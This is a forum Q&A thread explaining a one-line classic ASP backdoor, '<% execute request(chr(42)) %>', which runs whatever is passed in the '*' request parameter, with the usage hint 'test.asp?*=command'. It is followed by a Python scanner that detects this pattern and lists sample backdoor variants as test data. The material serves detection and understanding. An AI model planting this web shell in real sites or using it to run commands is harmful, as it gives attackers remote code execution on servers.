Reputation: 1488
I came across some code that accesses Request(chr(42)) (below) and executes it.
<% execute request(chr(42)) %>
I can't seem to find what '*' would return, as it doesn't seem like a valid QueryString variable name.
Upvotes: 2
Views: 727
Reputation: 2591
In classic ASP, you can call Request("some_key") and it will return the value of "some_key" of either the Request.Querystring (GET) or Request.Form (POST) data.
chr(42) is a valid key, so you can call the page with test.asp?*=command to execute something.
execute is a vbscript/asp function that lets you execute a string as ASP code, same as eval. details
before update (does not apply):
I only know of the Server.Execute method, which will execute some other ASP page.
All in all, it seems like some hack/backdoor as you suggested.
Upvotes: 3
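A defender-side check for the pattern discussed in this thread, as an added example that is not part of the original posts: a Python scan of classic ASP source for Execute, ExecuteGlobal or Eval applied directly to a Request lookup, resolving chr(N) keys such as chr(42) to the literal parameter name. The sample page text and the names scan and decode_key are constructed for illustration.

```python
import re

# Execute / ExecuteGlobal / Eval fed straight from a Request lookup.
# VBScript is case-insensitive; Server.Execute (runs another page) is excluded.
SINK = re.compile(
    r"(?<![.\w])(execute(?:global)?|eval)\s*\(?\s*request"
    r"(?:\s*\.\s*(?:querystring|form|item))?"
    r"\s*\(\s*([^()]*(?:\([^()]*\)[^()]*)*)\)",
    re.IGNORECASE,
)
# One piece of a key expression: chr(42), chr(&H2A) or a "string literal".
TOKEN = re.compile(
    r'chrw?\s*\(\s*(?:&h([0-9a-f]+)|(\d+))\s*\)|"((?:[^"]|"")*)"',
    re.IGNORECASE,
)

def decode_key(expr):
    """Resolve a key built only from chr(N) calls and literals joined by &.
    Returns None when the key depends on anything else (e.g. a variable)."""
    out, pos = [], 0
    for m in TOKEN.finditer(expr):
        if expr[pos:m.start()].strip(" &\t"):
            return None
        hexv, decv, lit = m.groups()
        if lit is not None:
            out.append(lit.replace('""', '"'))
        else:
            out.append(chr(int(hexv, 16) if hexv else int(decv)))
        pos = m.end()
    if not out or expr[pos:].strip(" &\t"):
        return None
    return "".join(out)

def scan(source):
    """Return one finding per dynamic-execution sink that reads request input."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in SINK.finditer(line):
            findings.append({"line": no, "sink": m.group(1).lower(),
                             "key": decode_key(m.group(2)),
                             "obfuscated": "chr" in m.group(2).lower()})
    return findings

# Constructed sample page content; line 1 is the snippet from the question.
SAMPLE = '''<% execute request(chr(42)) %>
<% Response.Write Server.HTMLEncode(Request("name")) %>
<% ExecuteGlobal Request.Form(chr(&H2A)) %>
<% x = Eval(Request("q")) %>
<% Server.Execute(Request("page")) %>
'''
```

A finding whose key is spelled with chr() rather than a literal is a strong review signal, since ordinary application code has no reason to hide a parameter name.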